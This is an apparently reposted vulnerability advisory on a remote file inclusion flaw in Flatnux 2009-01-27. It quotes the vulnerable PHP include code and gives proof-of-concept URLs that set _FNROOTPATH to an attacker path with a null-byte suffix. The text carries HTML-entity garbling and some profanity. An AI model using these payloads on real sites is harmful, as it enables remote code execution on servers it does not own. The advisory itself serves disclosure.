Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21295
HistoryFeb 05, 2009 - 12:00 a.m.

flatnux Flatnux-2009-01-27 Remote File Include

2009-02-0500:00:00
vulners.com
30

@ flatnux Flatnux-2009-01-27 RFI
zaleїnoњci P

  • Alfons Luja
  • 2009
  • grts : All friends

VULN :
+++ include/theme.php

<?php
if (eregi("theme.php", $_SERVER['PHP_SELF']))
die(); // 0 <– I dont give a fuck

         global $theme, $_FNROOTPATH,$lang;   //&lt;-- 1 
         global $forumback, $forumborder;       
         $_FN[&#39;table_background&#39;]=&amp;$forumback;
         $_FN[&#39;table_border&#39;]=&amp;$forumborder;


         if &#40;$forumback==&quot;&quot; &amp;&amp; $forumborder==&quot;&quot;&#41;{
            $forumback=&quot;ffffff&quot;;
            $forumborder=&quot;000000&quot;;
            }
            require_once &#40;$_FNROOTPATH . &quot;themes/$theme/theme.php&quot;&#41;;

         /*------- Funzioni ridefinibili da theme.php--------------*/
     //......
  +++ /flatnux.php line 116:
        
       //$_FNROOTPATH Still dont have value 
       include_once &quot;./include/theme.php&quot;;   //-- 2
      
  +++ /filemanager.php 
      include &quot;./include/flatnux.php&quot;; // -- RFI

p0c:
http://localhost/~flatnux/index.php?_FNROOTPATH=[EVIL]&#37;00
http://localhost/~flatnux/filemanager.php?mod=&amp;op=&amp;dir=/&amp;opmod=newfile&amp;filemanager_editor=tfuj_stary&amp;_FNROOTPATH=[EVIl]&#37;OO
… itd …

http://www.wrzuta.pl/audio/xLyg0zckZS/--
#EЈOF lol